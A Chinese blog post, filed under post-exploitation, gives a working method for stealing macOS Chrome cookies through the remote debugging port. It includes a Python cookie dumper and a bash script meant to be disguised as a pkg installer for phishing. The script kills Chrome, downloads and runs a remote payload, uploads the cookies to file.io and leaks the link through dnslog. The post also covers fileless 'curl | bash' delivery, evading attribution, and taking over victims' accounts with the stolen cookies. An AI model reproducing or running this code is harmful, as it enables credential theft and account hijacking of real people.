<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>全平台浏览器记录提取 | Plague</title><meta name="author" content="plague,plague.3389@gmail.com"><meta name="copyright" content="plague"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="HackBrowserData 是一个浏览器数据（密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件）的导出工具，支持全平台主流浏览器。 https:&#x2F;&#x2F;github.com&#x2F;moonD4rk&#x2F;HackBrowserData&#x2F;blob&#x2F;master&#x2F;README_ZH.md windows获取浏览器记录 mac使用远程调试：启动远程调试在 Mac 终端下启动">
<meta property="og:type" content="article">
<meta property="og:title" content="全平台浏览器记录提取">
<meta property="og:url" content="http://example.com/google/f2274642.html">
<meta property="og:site_name" content="Plague">
<meta property="og:description" content="HackBrowserData 是一个浏览器数据（密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件）的导出工具，支持全平台主流浏览器。 https:&#x2F;&#x2F;github.com&#x2F;moonD4rk&#x2F;HackBrowserData&#x2F;blob&#x2F;master&#x2F;README_ZH.md windows获取浏览器记录 mac使用远程调试：启动远程调试在 Mac 终端下启动">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picsum.photos/300/200/?random=3">
<meta property="article:published_time" content="2024-09-19T14:31:29.000Z">
<meta property="article:modified_time" content="2024-09-19T15:05:40.088Z">
<meta property="article:author" content="plague">
<meta property="article:tag" content="信息收集">
<meta property="article:tag" content="浏览器记录提取">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picsum.photos/300/200/?random=3"><link rel="shortcut icon" href="/img/logo.png"><link rel="canonical" href="http://example.com/google/f2274642.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css?v=4.13.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.1/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.11.1/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '全平台浏览器记录提取',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-09-19 23:05:40'
}</script><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
        if (t === 'dark') activateDarkMode()
        else if (t === 'light') activateLightMode()
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom.css"><link rel="stylesheet" href="/css/mycss.css"><link rel="stylesheet" href="/css/color.css"><link rel="stylesheet" href="/css/transpancy.css"><link rel="stylesheet" href="/css/icat_change.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css"><script src="/live2d-widget/autoload.js"></script><meta name="generator" content="Hexo 7.3.0"></head><body><script>window.paceOptions = {
  restartOnPushState: false
}

document.addEventListener('pjax:send', () => {
  Pace.restart()
})
</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/themes/blue/pace-theme-minimal.min.css"/><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/logo.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">6</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><hr class="custom-hr"/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 导航站</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://picsum.photos/300/200/?random=3')"><nav id="nav"><span id="blog-info"><a href="/" title="Plague"><span class="site-name">Plague</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 导航站</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">全平台浏览器记录提取</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2024-09-19T14:31:29.000Z" title="发表于 2024-09-19 22:31:29">2024-09-19</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2024-09-19T15:05:40.088Z" title="更新于 2024-09-19 23:05:40">2024-09-19</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%90%8E%E5%88%A9%E7%94%A8/">后利用</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="全平台浏览器记录提取"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:<section class="main-hero-waves-area waves-area"><svg class="waves-svg" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M -160 44 c 30 0 58 -18 88 -18 s 58 18 88 18 s 58 -18 88 -18 s 58 18 88 18 v 44 h -352 Z"></path></defs><g class="parallax"><use href="#gentle-wave" x="48" y="0"></use><use href="#gentle-wave" x="48" y="3"></use><use href="#gentle-wave" x="48" y="5"></use><use href="#gentle-wave" x="48" y="7"></use></g></svg></section></span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>HackBrowserData 是一个浏览器数据（密码|历史记录|Cookie|书签|信用卡|下载记录|localStorage|浏览器插件）的导出工具，支持全平台主流浏览器。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md">https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md</a></p>
<p>windows获取浏览器记录</p>
<h2 id="mac使用远程调试："><a href="#mac使用远程调试：" class="headerlink" title="mac使用远程调试："></a>mac使用远程调试：</h2><h3 id="启动远程调试"><a href="#启动远程调试" class="headerlink" title="启动远程调试"></a>启动远程调试</h3><p><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">在 Mac 终端下启动浏览器的远程调试可以使用以下步骤：</font></p>
<ol>
<li><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">首先确认远程调试已经打开，开启远程调试步骤如下：在要调试的浏览器中输入</font><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);"> </font><strong><font style="background-color:rgb(249, 250, 251);">chrome:&#x2F;&#x2F;inspect&#x2F;#devices</font></strong><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">，勾选需要远程调试的页面后点击“inspect”即可。</font></li>
<li><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">在命令行中输入以下命令启动 Chrome 浏览器（或者其他需要调试的浏览器）：</font></li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222</span><br></pre></td></tr></table></figure>

<p><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">如果要启动 Safari 浏览器，则可使用以下命令：</font></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/Applications/Safari.app/Contents/MacOS/Safari -p 9222</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">接下来，在本机的 Chrome 浏览器中输入</font><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);"> </font><strong><font style="background-color:rgb(249, 250, 251);">localhost:9222</font></strong><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);"> </font><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);">即可连接远程调试，选择要调试的页面进行远程调试。</font></li>
</ol>
<p><font style="color:rgb(55, 65, 81);background-color:rgb(249, 250, 251);"></font></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&quot;/Applications/Google Chrome.app/Contents/MacOS/Google Chrome&quot; \</span><br><span class="line">--remote-debugging-port=9222 \</span><br><span class="line">--user-data-dir=&quot;/Users/$&#123;username&#125;/Library/Application Support/Google/Chrome&quot; \</span><br><span class="line">--crash-dumps-dir=/tmp \</span><br><span class="line">--disable-gpu \</span><br><span class="line">--disk-cache-dir=/tmp \</span><br><span class="line">--restore-last-session \</span><br><span class="line">--remote-allow-origins=* &amp;</span><br></pre></td></tr></table></figure>

<h3 id="获取浏览器现有的cookie"><a href="#获取浏览器现有的cookie" class="headerlink" title="获取浏览器现有的cookie"></a>获取浏览器现有的cookie</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https://127.0.0.1:9222/json</span><br></pre></td></tr></table></figure>

<p>然后你就会获取到大量的webSocketDebuggerUrl</p>
<p><img src="/google/f2274642/img.png"></p>
<h4 id="用Simple-WebSocket-Client插件来实现"><a href="#用Simple-WebSocket-Client插件来实现" class="headerlink" title="用Simple WebSocket Client插件来实现"></a>用Simple WebSocket Client插件来实现</h4><p>这里webSocketDebuggerUrl随机选一个填入就行，然后send {“id”: 1, “method”: “Network.getAllCookies”}，就可以得到所有保存的cookie</p>
<p><img src="/google/f2274642/img_1.png"></p>
<h4 id="用python脚本来实现"><a href="#用python脚本来实现" class="headerlink" title="用python脚本来实现"></a>用python脚本来实现</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">import</span> csv</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> urllib.request</span><br><span class="line"><span class="keyword">import</span> websocket</span><br><span class="line"></span><br><span class="line"><span class="comment">#mac的远程调试命令主要是三步</span></span><br><span class="line"><span class="comment">##1. 启动调试</span></span><br><span class="line"><span class="comment">##2. 获取webSocketDebuggerUrl</span></span><br><span class="line"><span class="comment">##3. 获取cookie</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 解析命令行参数</span></span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line">parser.add_argument(<span class="string">&quot;--ip&quot;</span>, <span class="built_in">help</span>=<span class="string">&quot;Chrome Remote Debugging IP&quot;</span>, required=<span class="literal">True</span>)</span><br><span class="line">parser.add_argument(<span class="string">&quot;--port&quot;</span>, <span class="built_in">help</span>=<span class="string">&quot;Chrome Remote Debugging Port&quot;</span>, required=<span class="literal">True</span>)</span><br><span class="line">args = parser.parse_args()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 构造请求 JSON 数据的 URL</span></span><br><span class="line">debugging_url = <span class="string">&quot;http://&#123;&#125;:&#123;&#125;/json&quot;</span>.<span class="built_in">format</span>(args.ip, args.port)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取可用的 WebSocket Url</span></span><br><span class="line"><span class="keyword">with</span> urllib.request.urlopen(debugging_url) <span class="keyword">as</span> url:</span><br><span class="line">    data = json.loads(url.read().decode())</span><br><span class="line">    <span class="comment"># 随机选取一个 url</span></span><br><span class="line">    webSocketDebuggerUrl = random.choice(data)[<span class="string">&quot;webSocketDebuggerUrl&quot;</span>]</span><br><span class="line">    <span class="built_in">print</span>(webSocketDebuggerUrl)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 连接 WebSocket，并请求 cookie 数据</span></span><br><span class="line">ws = websocket.create_connection(webSocketDebuggerUrl)</span><br><span class="line">ws.send(<span class="string">&#x27;&#123;&quot;id&quot;: 1, &quot;method&quot;: &quot;Network.getAllCookies&quot;&#125;&#x27;</span>)</span><br><span class="line">result = ws.recv()</span><br><span class="line">response = json.loads(result)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">cookies = response[<span class="string">&#x27;result&#x27;</span>][<span class="string">&#x27;cookies&#x27;</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;cookie.json&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    json.dump(cookies, f, indent=<span class="number">2</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;cookie.json saved!&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 将 cookie 写入 CSV 文件中</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;cookie.csv&#x27;</span>, <span class="string">&#x27;w&#x27;</span>, newline=<span class="string">&#x27;&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    writer = csv.writer(f)</span><br><span class="line">    writer.writerow([<span class="string">&#x27;name&#x27;</span>, <span class="string">&#x27;value&#x27;</span>, <span class="string">&#x27;domain&#x27;</span>, <span class="string">&#x27;path&#x27;</span>, <span class="string">&#x27;expires&#x27;</span>, <span class="string">&#x27;httpOnly&#x27;</span>, <span class="string">&#x27;secure&#x27;</span>, <span class="string">&#x27;sameSite&#x27;</span>])</span><br><span class="line">    <span class="keyword">for</span> cookie <span class="keyword">in</span> cookies:</span><br><span class="line">        writer.writerow([</span><br><span class="line">            cookie.get(<span class="string">&#x27;name&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;value&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;domain&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;path&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;expires&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;httpOnly&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;secure&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">            cookie.get(<span class="string">&#x27;sameSite&#x27;</span>, <span class="string">&#x27;&#x27;</span>),</span><br><span class="line">        ])</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;cookie.csv saved!&quot;</span>)</span><br><span class="line">total_cookies = <span class="built_in">len</span>(cookies)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;本次总计获取到 &#123;&#125; 条 cookie&quot;</span>.<span class="built_in">format</span>(total_cookies))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ws.close()</span><br></pre></td></tr></table></figure>

<p><img src="/google/f2274642/img_3.png"></p>
<h3 id="使用Cookie-Editor添加所需的cookie，然后就可以直接操作了"><a href="#使用Cookie-Editor添加所需的cookie，然后就可以直接操作了" class="headerlink" title="使用Cookie Editor添加所需的cookie，然后就可以直接操作了"></a>使用Cookie Editor添加所需的cookie，然后就可以直接操作了</h3><p><img src="/google/f2274642/img_2.png"></p>
<h3 id="自动化钓鱼或者入侵后的信息收集"><a href="#自动化钓鱼或者入侵后的信息收集" class="headerlink" title="自动化钓鱼或者入侵后的信息收集"></a>自动化钓鱼或者入侵后的信息收集</h3><p>一般分两种情况：</p>
<ol>
<li>无论是钓鱼还是溯源，我们都需要让他自己运行一次，然后把cookie文件返回给我们</li>
<li>我们已经入侵了机器，现在只需要收集cookie文件就行，无需进行文件回传（直接操作下载就行）</li>
</ol>
<h4 id="钓鱼的思路："><a href="#钓鱼的思路：" class="headerlink" title="钓鱼的思路："></a>钓鱼的思路：</h4><p>写一个sh脚本用pkg打包或者dmg打包，伪装安装包的形式让其运行。</p>
<p>这里有几个要点：</p>
<ol>
<li>执行的时候无文件落地</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s https://www.xxx.com/a.sh | bash</span><br></pre></td></tr></table></figure>

<p>然后我们这里可以设置脚本一分钟内有效（防止溯源）用cos设置比较简单，或者有肉鸡站，使用完直接删除就行。</p>
<p>或者自己写一个接口，给他颁发一个key，这个key一次有效性，（类似于敲门的机制）</p>
<ol start="2">
<li>回传cookie文件的时候要匿名</li>
</ol>
<p>使用匿名frp （<a target="_blank" rel="noopener" href="https://file.io)/">https://file.io）</a></p>
<p>会直接返回一个存放文件的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># cookie_url=$(curl -F &quot;file=@cookie.csv&quot; https://file.io)</span></span><br><span class="line"><span class="comment"># json_url=$(curl -F &quot;file=@your_file.json&quot; https://file.io)</span></span><br></pre></td></tr></table></figure>



<p>自动化的sh脚本：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1. Kill all Google Chrome processes</span></span><br><span class="line">killall <span class="string">&quot;Google Chrome&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. Get current username</span></span><br><span class="line">username=$(<span class="built_in">whoami</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. Start Chrome Headless with the specified parameters, replacing &quot;&#123;用户名&#125;&quot; with the actual username</span></span><br><span class="line"><span class="string">&quot;/Applications/Google Chrome.app/Contents/MacOS/Google Chrome&quot;</span> \</span><br><span class="line">--remote-debugging-port=9222 \</span><br><span class="line">--user-data-dir=<span class="string">&quot;/Users/<span class="variable">$&#123;username&#125;</span>/Library/Application Support/Google/Chrome&quot;</span> \</span><br><span class="line">--crash-dumps-dir=/tmp \</span><br><span class="line">--disable-gpu \</span><br><span class="line">--disk-cache-dir=/tmp \</span><br><span class="line">--restore-last-session \</span><br><span class="line">--remote-allow-origins=* &amp;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. Download, extract, and execute Python project</span></span><br><span class="line">curl -O -k https://google-1259711289.cos.ap-beijing.myqcloud.com/google.zip</span><br><span class="line">unzip -P biubiubiu -o google.zip -d ~/Downloads/ &amp;&amp; <span class="built_in">rm</span> google.zip</span><br><span class="line"><span class="built_in">cd</span> ~/Downloads/google &amp;&amp; pip3 install -r requirements.txt</span><br><span class="line">python3 getcookie.py --ip 127.0.0.1 --port 9222</span><br><span class="line"></span><br><span class="line"><span class="comment"># 5. Upload cookie.csv and json to file.io, output URLs</span></span><br><span class="line"><span class="comment"># cookie_url=$(curl -F &quot;file=@cookie.csv&quot; https://file.io)</span></span><br><span class="line"><span class="comment"># json_url=$(curl -F &quot;file=@your_file.json&quot; https://file.io)</span></span><br><span class="line"><span class="comment"># 上传文件到file.io</span></span><br><span class="line">response=$(curl -k -F <span class="string">&quot;file=@cookie.csv&quot;</span> https://file.io)</span><br><span class="line">file_link=$(<span class="built_in">echo</span> <span class="variable">$response</span> | sed -n <span class="string">&#x27;s/.*&quot;link&quot;:&quot;https:\/\/file.io\/\([^&quot;]*\).*/\1/p&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ -z <span class="string">&quot;<span class="variable">$file_link</span>&quot;</span> ]; <span class="keyword">then</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;文件上传失败:&quot;</span></span><br><span class="line">  <span class="built_in">echo</span> <span class="variable">$response</span></span><br><span class="line">  <span class="built_in">exit</span> 1</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;文件上传成功，链接：https://file.io/<span class="variable">$file_link</span>&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 将URL编码为适用于DNS记录的字符串</span></span><br><span class="line">encoded_file_link=$(<span class="built_in">printf</span> <span class="variable">$&#123;file_link//:/_%3A_&#125;</span> | <span class="built_in">tr</span> <span class="string">&#x27;/.&#x27;</span> <span class="string">&#x27;_%2E_&#x27;</span>)</span><br><span class="line">USERNAME=<span class="string">&quot;<span class="variable">$encoded_file_link</span>&quot;</span></span><br><span class="line"><span class="built_in">echo</span> USERNAME</span><br><span class="line"><span class="comment"># 将文件链接发送到dnslog</span></span><br><span class="line">DOMAIN=<span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br><span class="line">curl <span class="string">&quot;http://<span class="variable">$USERNAME</span>.<span class="variable">$DOMAIN</span>&quot;</span> -s -o /dev/null</span><br><span class="line">killall <span class="string">&quot;Google Chrome&quot;</span></span><br><span class="line"><span class="built_in">rm</span> -rf ~/Downloads/google</span><br></pre></td></tr></table></figure>

<p>这里取决于你想不想把文件给发送回来，如果是钓鱼的话，还是要发送回来的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s <span class="string">&quot;你的脚本链接&quot;</span> |bash -s -- 你的dnslog地址</span><br></pre></td></tr></table></figure>

<p>然后打包一个pkg安装包，把这个放进去就可以进行钓鱼了。准备好你的sh远程地址和dnslog地址就行。 当然你也可以直接加上上线的命令。直接就一劳永逸。</p>
<h4 id="信息收集的思路："><a href="#信息收集的思路：" class="headerlink" title="信息收集的思路："></a>信息收集的思路：</h4><p>直接进去无文件落地+cos一分钟有效授权就开了弄</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s <span class="string">&quot;你的脚本链接&quot;</span> |bash -s -- 你的dnslog地址</span><br></pre></td></tr></table></figure>



<p>然后你会在dnslog看到你的文件链接。直接<a target="_blank" rel="noopener" href="https://file.io/+%E4%BD%A0%E7%9A%84%E6%96%87%E4%BB%B6%E9%93%BE%E6%8E%A5">https://file.io/+你的文件链接</a></p>
<p><img src="/google/f2274642/img_4.png"></p>
<p>然后你就可以拿到cookie了。筛选后用Cookie Editor,上去看看他能干啥，修改个密码啥的。你想干啥就干啥</p>
